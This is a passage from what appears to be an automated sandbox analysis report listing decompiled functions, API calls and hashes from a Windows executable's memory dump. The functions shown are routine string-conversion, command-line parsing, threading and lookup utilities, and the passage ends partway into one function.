Instruction ID: 85927fc96f9716e1d1e6d5b1ddc4ac0db90fb70db8c0b3b43891102a4ed5054c
Opcode Fuzzy Hash: 66c029c88698f590c27d8ad2e0cedff0409db7e2b7cc0c33a88c903db2356ffd
Instruction Fuzzy Hash: 3A215775A043198BC710EF59A840477B7E4EB80761F46087AFC85A3380D63AEE199BB9

Uniqueness

Uniqueness Score: -1.00%

Function 00411E80, Relevance: 6.1, APIs: 4, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411E80(short* _a4) {
				void* _t6;
				short _t7;
				int _t12;
				short* _t13;
				short* _t17;
				char* _t18;
				short* _t19;
				int _t20;
				void* _t21;

				_t19 = _a4;
				if(_t19 == 0) {
					L6:
					_t6 = malloc(1);
					 *_t6 = 0;
					return _t6;
				} else {
					_t13 = _t19;
					_t2 =  &(_t13[1]); // 0x2
					_t17 = _t2;
					do {
						_t7 =  *_t13;
						_t13 =  &(_t13[1]);
					} while (_t7 != 0);
					_t3 = (_t13 - _t17 >> 1) + 1; // -1
					_t20 = _t3;
					_t12 = WideCharToMultiByte(0xfde9, 0, _t19, _t20, 0, 0, 0, 0);
					if(_t12 == 0) {
						goto L6;
					} else {
						_t4 = _t12 + 1; // 0x1
						_t18 = malloc(_t4);
						_t21 = _t21 + 4;
						if(_t18 == 0) {
							goto L6;
						} else {
							_t18[WideCharToMultiByte(0xfde9, 0, _t19, _t20, _t18, _t12, 0, 0)] = 0;
							return _t18;
						}
					}
				}
			}

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D058,00000000), ref: 00411EB4
malloc.MSVCRT ref: 00411EC4
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 00411EE1
malloc.MSVCRT ref: 00411EF6

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: f99b9e9cc375a0f51ee550c492f080850f9660593670d0a959cc873830a669a1
Instruction ID: da1f4c5307a9808d3c7f8614f95932c7effa64efca2e052dfed00f08d58b5d3d
Opcode Fuzzy Hash: f99b9e9cc375a0f51ee550c492f080850f9660593670d0a959cc873830a669a1
Instruction Fuzzy Hash: FE012E3734030227E32066A6AC02FE77B49CB85B95F19407AFF005E2C1CAA3A8008A79

Uniqueness

Uniqueness Score: -1.00%

Function 00411F20, Relevance: 6.1, APIs: 4, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411F20(short* _a4) {
				void* _t6;
				short _t7;
				int _t12;
				short* _t13;
				short* _t17;
				char* _t18;
				short* _t19;
				int _t20;
				void* _t21;

				_t19 = _a4;
				if(_t19 == 0) {
					L6:
					_t6 = malloc(1);
					 *_t6 = 0;
					return _t6;
				} else {
					_t13 = _t19;
					_t17 =  &(_t13[1]);
					do {
						_t7 =  *_t13;
						_t13 =  &(_t13[1]);
					} while (_t7 != 0);
					_t20 = (_t13 - _t17 >> 1) + 1;
					_t12 = WideCharToMultiByte(0, 0, _t19, _t20, 0, 0, 0, 0);
					if(_t12 == 0) {
						goto L6;
					} else {
						_t4 = _t12 + 1; // 0x1
						_t18 = malloc(_t4);
						_t21 = _t21 + 4;
						if(_t18 == 0) {
							goto L6;
						} else {
							_t18[WideCharToMultiByte(0, 0, _t19, _t20, _t18, _t12, 0, 0)] = 0;
							return _t18;
						}
					}
				}
			}

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00411F51
malloc.MSVCRT ref: 00411F61
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00411F7B
malloc.MSVCRT ref: 00411F90

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: 5325b0ad4490700c2010cf27b2c704082c058671d9b3d0b05cc6651335db68c7
Instruction ID: 2143df0fa8f9e7073c9e362d0ea50869445b156f554053f4d5fb65981249776a
Opcode Fuzzy Hash: 5325b0ad4490700c2010cf27b2c704082c058671d9b3d0b05cc6651335db68c7
Instruction Fuzzy Hash: AE01643738030037E3204A95AC02FA77B4DCBC5B95F19407AFB005E2C6CBB3A8018AB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A90C, Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

SHGetFolderLocation.SHELL32(00000000,02769340,00000000,00000000,00000000,00000000,00000000,?,00000104,0040A8BB,00000000,00000000,00000104,?), ref: 0040A91E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040A92F
wcslen.MSVCRT ref: 0040A93A
CoTaskMemFree.OLE32(00000000,?,00000104,0040A8BB,00000000,00000000,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000), ref: 0040A958

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: FolderFreeFromListLocationPathTaskwcslen
String ID:
API String ID: 4012708801-0
Opcode ID: 1d539ddef34536a218538a68ec0bd755f4d96d5f82a4622414e5c8c43dda79cb
Instruction ID: e8765f26a12464aff5057ee3a7a78408a7749531e725ecdfcc70520e35881baf
Opcode Fuzzy Hash: 1d539ddef34536a218538a68ec0bd755f4d96d5f82a4622414e5c8c43dda79cb
Instruction Fuzzy Hash: 70F08136600615BBC7206F66DC0AEAB7F78EF16660B424136F805E6250E7319920C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 34
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405436(intOrPtr _a4) {
				int _t4;
				intOrPtr _t9;
				intOrPtr* _t10;

				_t9 = _a4;
				_t4 = TerminateThread(E004053EA(_t9), 0);
				EnterCriticalSection(0x4176a0);
				_t10 =  *0x4170bc; // 0x0
				while(_t10 != 0) {
					if( *((intOrPtr*)(_t10 + 0xc)) == _t9) {
						_t11 = _t10 + 8;
						CloseHandle( *(_t10 + 8));
						_t4 = E0040DAD2(0x4170bc, _t11);
					} else {
						_t10 =  *_t10;
						continue;
					}
					L6:
					LeaveCriticalSection(0x4176a0);
					return _t4;
				}
				goto L6;
			}

0x00405439
0x00405446
0x00405452
0x00405458
0x00405467
0x00405463
0x0040546d
0x00405472
0x0040547e
0x00405465
0x00405465
0x00000000
0x00405465
0x00405485
0x00405486
0x0040548f
0x0040548f
0x00000000

APIs

Part of subcall function 004053EA: EnterCriticalSection.KERNEL32(004176A0,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 004053F5
Part of subcall function 004053EA: LeaveCriticalSection.KERNEL32(004176A0,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405428

TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405446
EnterCriticalSection.KERNEL32(004176A0,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405452
CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405472

Part of subcall function 0040DAD2: HeapFree.KERNEL32(00000000,-00000008,0040D3EB,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB0B

LeaveCriticalSection.KERNEL32(004176A0,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405486

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
String ID:
API String ID: 85618057-0
Opcode ID: 66861cca315dffbfe371a5ba103c1e5b91a8d79734cb270ef81e9151ba7a87fc
Instruction ID: e82d31de5584acb3c1822b09e6e690cbeb5bd259d621742d6e77904c892493b9
Opcode Fuzzy Hash: 66861cca315dffbfe371a5ba103c1e5b91a8d79734cb270ef81e9151ba7a87fc
Instruction Fuzzy Hash: D4F0BE36904710EBC2205F60AC48BEB7B68EB44763726843BF80273190C738AC808E6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403001, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 193COMMON

Download Yara Rule

APIs

Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000001B,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C), ref: 0040DF77

Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 00405E50: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405EA1

Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02760000,00000000,?), ref: 0040DE99

Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(02760000,00000000,?,?), ref: 0040DEBC

Part of subcall function 00402E9D: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402EC5

Part of subcall function 004092F5: CoInitialize.OLE32(00000000), ref: 00409313
Part of subcall function 004092F5: memset.MSVCRT ref: 00409321
Part of subcall function 004092F5: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040932E
Part of subcall function 004092F5: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 00409350
Part of subcall function 004092F5: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 0040935C
Part of subcall function 004092F5: wcsncpy.MSVCRT ref: 0040937D
Part of subcall function 004092F5: wcslen.MSVCRT ref: 00409391
Part of subcall function 004092F5: CoTaskMemFree.OLE32(?), ref: 0040941A
Part of subcall function 004092F5: wcslen.MSVCRT ref: 00409421
Part of subcall function 004092F5: FreeLibrary.KERNEL32(00000000,00000000), ref: 00409440

Part of subcall function 00403CD7: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A61,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403D07

PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 004031CC

Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7

PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,02768AF0,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 00403231

Part of subcall function 00402CA9: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402D44

Strings

`A, xrefs: 004030CC

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorFreeHeapLastLibraryPathProc$CharInitializeLoadRemoveTaskUppermemsetwcsncpy
String ID: `A
API String ID: 2009453447-2737472851
Opcode ID: 95adbcaa2ab5ee70eb3dc5b94c51e17671b79cd70e6355162ca6a04cdaa6e4f4
Instruction ID: e0b9ffac2fcbd3cac9e210611f46d13d34f6da227652cecd82e9aee9d1240e54
Opcode Fuzzy Hash: 95adbcaa2ab5ee70eb3dc5b94c51e17671b79cd70e6355162ca6a04cdaa6e4f4
Instruction Fuzzy Hash: 2551C4B9A04B047EE500BBF2DD82E7F666EDAD4718B10983FB440BD0D2C93C9D49666D

Uniqueness

Uniqueness Score: -1.00%

Function 004024F1, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E004024F1(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a36) {
				char _v0;
				signed int _v4;
				char _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				char _v20;
				void* _t31;
				void* _t32;
				void* _t37;
				WCHAR* _t41;
				void* _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				char* _t66;
				void* _t68;
				void* _t69;
				void* _t73;
				char _t84;
				void* _t85;
				void* _t88;
				void* _t90;
				void* _t91;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t101;
				void* _t102;
				intOrPtr* _t103;

				_t102 = __esi;
				_t84 = 9;
				do {
					_t103 = _t103 - 4;
					_v8 = 0;
					_t84 = _t84 - 1;
				} while (_t84 != 0);
				E004051A0(E0040DF60(), _a36);
				 *0x41702c = 0x4160d0;
				_v12 = 0;
				while(1) {
					_t106 = 6 - _v8;
					if(6 < _v8) {
						break;
					}
					_t66 =  *0x41702c; // 0x41609a
					_v4 =  *_t66;
					 *0x41702c =  *0x41702c + 1;
					_t68 = E0040DE20();
					_t98 = _t84;
					_push(_t68);
					_push(_t98);
					_t69 = E0040DE20();
					E00405D60(_t106, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t69);
					_push(_v12);
					_t73 = E0040DE20();
					_pop(_t101);
					E0040DFC0(_t101);
					_t84 = _v20;
					E0040DFC0(_t84);
					E0040DE60( &_v20, _t73);
					 *_t103 =  *_t103 + 1;
					if( *_t103 >= 0) {
						continue;
					}
					break;
				}
				_t31 = E0040DE20();
				_t85 = _t84;
				_push(_t31);
				_t32 = E0040DE20();
				E00409B60(GetCommandLineW(), _t32);
				E0040DE60( &_v0, _t85);
				_push(_v8);
				_t37 = E0040DE20();
				_pop(_t88);
				E0040DFC0(_t88);
				E0040DE60( &_v8, _t37);
				_t41 = _v16;
				PathRemoveArgsW(_t41);
				_v12 = _t41;
				_v12 = E00405D80(_v16);
				if(_v12 > 0) {
					_push(_t88);
					_push(E0040DE20());
					E0040DFC0(0x416026);
					_t56 = E0040DE20();
					_t94 = 0x416026;
					_push(_t56);
					_t57 = E0040DE20();
					_t95 = _t94;
					_push(_t57);
					_t58 = E0040DE20();
					_t96 = _t95;
					_push(_t58);
					_t59 = E0040DE20();
					_t97 = _t96;
					E00405182(E004060B0(_t102, _a4, _a16 + 1, _t59));
					 *_t103 =  *_t103 + _t97;
					E00406000();
					_push( &_v0);
					E0040DE60();
				}
				E00409860(_a4, _a24);
				_push(_a16);
				_t44 = E0040DE20();
				_pop(_t90);
				E0040DFC0(_t90);
				_t46 = _t44;
				_t47 = E00405170();
				_t91 = _t46;
				_t48 = _t47 + _t91;
				return E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(_t48, _a12), _v4), _v0), _v8), _a8);
			}

APIs

GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 004025A3
PathRemoveArgsW.SHLWAPI(?), ref: 004025D9

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02760000,00000000,?), ref: 0040DE99

Part of subcall function 00409860: SetEnvironmentVariableW.KERNELBASE(02769340,02769340,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409879

Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B

Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7

Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178

Part of subcall function 0040DEF0: HeapFree.KERNEL32(02760000,00000000,00000000,?,00000000,?,00411AC4,00000000,00000000,-00000008), ref: 0040DF08

Strings

&`A, xrefs: 004025FF

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
String ID: &`A
API String ID: 1199808876-2812803553
Opcode ID: 3a8b2930490a16416bc5211f3a970ff8349e94485dee32ac6e367cc93453338b
Instruction ID: f63cb6ba6756906bb1a885948d3e935d11b840abb1ca4822bfa7626acd848ba7
Opcode Fuzzy Hash: 3a8b2930490a16416bc5211f3a970ff8349e94485dee32ac6e367cc93453338b
Instruction Fuzzy Hash: 0341EEB59047016ED600BBB2DD8193F77ADEBD4718F10983FB040AA1D2CA3CD8595A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004096DA, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004096DA(void* __eflags, WCHAR* _a4) {
				signed int* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				WCHAR* _t11;
				signed int _t14;
				signed int _t15;
				WCHAR* _t17;
				signed int _t18;
				void* _t21;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				WCHAR* _t26;
				void* _t28;
				void* _t29;
				void* _t30;
				signed int* _t31;
				WCHAR* _t32;

				E0040D288( *0x4176c4);
				_t15 = _t14 | 0xffffffff;
				_t32 = 0;
				_t11 = GetCommandLineW();
				_t31 = _v0;
				_t24 =  *_t11 & 0x0000ffff;
				if(_t24 == 0) {
					L30:
					if(_t31 != 0) {
						L34:
						 *_t31 = 0;
						return _t11;
					}
					return _t15;
				}
				_t17 = _a4;
				_v8 = 0x20;
				_v4 = 0x22;
				do {
					if(_t24 != _v8) {
						L5:
						_t25 =  *_t11 & 0x0000ffff;
						_a4 = 1;
						if(_t25 != _v4) {
							if(_t25 == 0) {
								_t26 = 0;
								L25:
								if(_v0 != _t15 || _t31 == 0) {
									goto L27;
								} else {
									if(_t32 == 0) {
										goto L34;
									}
									 *_t31 = _t17 - _t32 >> 1;
									_v0 =  &(_v0[0]);
									return _t32;
								}
							}
							_t32 = _t11;
							_t21 = 0x20;
							while(_t25 != _t21) {
								_t11 =  &(_t11[1]);
								_t28 = 0x22;
								if( *_t11 != _t28) {
									L20:
									_t25 =  *_t11 & 0x0000ffff;
									if(_t25 != 0) {
										continue;
									}
									break;
								}
								_t11 =  &(_t11[1]);
								_t23 =  *_t11 & 0x0000ffff;
								if(_t23 == 0) {
									L22:
									_t17 = _t11;
									L23:
									_t26 = _a4;
									goto L25;
								}
								while(_t23 != _t28) {
									_t11 =  &(_t11[1]);
									_t23 =  *_t11 & 0x0000ffff;
									if(_t23 != 0) {
										continue;
									}
									break;
								}
								_t21 = 0x20;
								goto L20;
							}
							L10:
							if( *_t11 == 0) {
								goto L22;
							}
							_t17 = _t11;
							_t11 =  &(_t11[1]);
							goto L23;
						}
						_t11 =  &(_t11[1]);
						_t32 = _t11;
						_t18 =  *_t11 & 0x0000ffff;
						if(_t18 == 0) {
							goto L22;
						}
						_t29 = 0x22;
						while(_t18 != _t29) {
							_t11 =  &(_t11[1]);
							_t18 =  *_t11 & 0x0000ffff;
							if(_t18 != 0) {
								continue;
							}
							goto L10;
						}
						goto L10;
					}
					_t30 = 0x20;
					do {
						_t11 =  &(_t11[1]);
					} while ( *_t11 == _t30);
					goto L5;
					L27:
					if(_t26 != 0) {
						_t15 = _t15 + 1;
					}
					_t32 = 0;
					_t24 =  *_t11 & 0x0000ffff;
				} while (_t24 != 0);
				goto L30;
			}

APIs

Part of subcall function 0040D288: TlsGetValue.KERNEL32(?,00409809,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D28F
Part of subcall function 0040D288: HeapAlloc.KERNEL32(00000008,?,?,00409809,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D2AA
Part of subcall function 0040D288: TlsSetValue.KERNEL32(00000000,?,?,00409809,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D2B9

GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409810,00000000,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 004096F4

Strings

, xrefs: 0040970E
", xrefs: 00409716

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$AllocCommandHeapLine
String ID: $"
API String ID: 1339485270-3817095088
Opcode ID: f97b4f0fc6cdbdc4f126a07b0d6f143b00e44276b0d28f9304cf3883811f345f
Instruction ID: 4c648ba0253d95f00ea60fdf00931512a06ba22242bcbe44c620df30a2d3858e
Opcode Fuzzy Hash: f97b4f0fc6cdbdc4f126a07b0d6f143b00e44276b0d28f9304cf3883811f345f
Instruction Fuzzy Hash: 6031A473525221CADB749F24981137772A1EBB1B60F18817FE8926B3C2F37D8D419359

Uniqueness

Uniqueness Score: -1.00%

Function 00409F58, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00409F58(intOrPtr* _a4, wchar_t* _a8) {
				signed int _t36;
				intOrPtr _t38;
				wchar_t* _t39;
				intOrPtr* _t50;
				intOrPtr* _t51;
				signed int _t52;

				_t39 = _a8;
				if(_t39 == 0) {
					_t39 = 0x412024;
				}
				_t51 = _a4;
				_push(_t39);
				if(( *(_t51 + 0x2c) & 0x00000001) == 0) {
					_t52 = E0040A24F() %  *(_t51 + 0x24);
					_t50 =  *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)) + _t52 * 4));
					while(_t50 != 0) {
						if(wcscmp( *(_t50 + 4), _t39) == 0) {
							goto L8;
						}
						 *((intOrPtr*)(_t51 + 8)) = _t50;
						_t50 =  *_t50;
					}
					goto L13;
				} else {
					_t36 = E0040A26A();
					_t38 =  *((intOrPtr*)(_t51 + 4));
					_t52 = _t36 %  *(_t51 + 0x24);
					_t50 =  *((intOrPtr*)(_t38 + _t52 * 4));
					while(_t50 != 0) {
						_push(_t39);
						_push( *(_t50 + 4));
						L0040531F();
						if(_t38 == 0) {
							L8:
							 *(_t51 + 0x14) = _t52;
							 *_t51 = _t50;
							return _t50 + 8;
						}
						 *((intOrPtr*)(_t51 + 8)) = _t50;
						_t50 =  *_t50;
					}
					L13:
					return 0;
				}
			}

APIs

_wcsicmp.MSVCRT ref: 00409F8D
wcscmp.MSVCRT ref: 00409FC6

Strings

$ A, xrefs: 00409F64

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsicmpwcscmp
String ID: $ A
API String ID: 3419221977-1415209610
Opcode ID: f21810243c52a83e43149c8ba45ed39ee43fe6731525ce4266dde6b58930fcab
Instruction ID: a733317a4b81313ba419c318017c22e6bf29b3e2c3e1e122568c9b8a7727cdd0
Opcode Fuzzy Hash: f21810243c52a83e43149c8ba45ed39ee43fe6731525ce4266dde6b58930fcab
Instruction Fuzzy Hash: 1111BFB2108B028FD3209F16D440923B3E9EFC8360324843FE849A3792DB79FC118A69

Uniqueness

Uniqueness Score: -1.00%

Function 00405700, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405700(short* _a4) {
				char* _t6;
				short* _t7;
				int _t8;

				_t7 = _a4;
				if(_t7 == 0) {
					_t7 = 0x412024;
				}
				_t8 = WideCharToMultiByte(0xfde9, 0, _t7, 0xffffffff, 0, 0, 0, 0);
				_t6 = E00409B40(_t8);
				if(_t6 != 0) {
					WideCharToMultiByte(0xfde9, 0, _t7, 0xffffffff, _t6, _t8, 0, 0);
				}
				return _t6;
			}

0x00405702
0x00405709
0x0040570b
0x0040570b
0x00405728
0x00405730
0x00405734
0x00405746
0x00405746
0x00405751

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405722
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405746

Strings

$ A, xrefs: 0040570B

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID: $ A
API String ID: 626452242-1415209610
Opcode ID: ca72461ec9b0f3d02c9927fa16f8ee0024e96a70de694c605e1f9d49a19121eb
Instruction ID: 51e3e9442c1b14bfca279b8410f0cbc31bbd530ab1d9b24216a3048053e00ad1
Opcode Fuzzy Hash: ca72461ec9b0f3d02c9927fa16f8ee0024e96a70de694c605e1f9d49a19121eb
Instruction Fuzzy Hash: FFF0303638522176E231215A5C06F576A59C785F70F264236BB24BF2C585A1680059AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040D51F, Relevance: 5.1, APIs: 4, Instructions: 134
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D51F(char _a4) {
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t70;
				signed int _t78;
				signed int _t81;
				intOrPtr _t83;
				signed int _t84;
				intOrPtr _t85;
				long _t87;
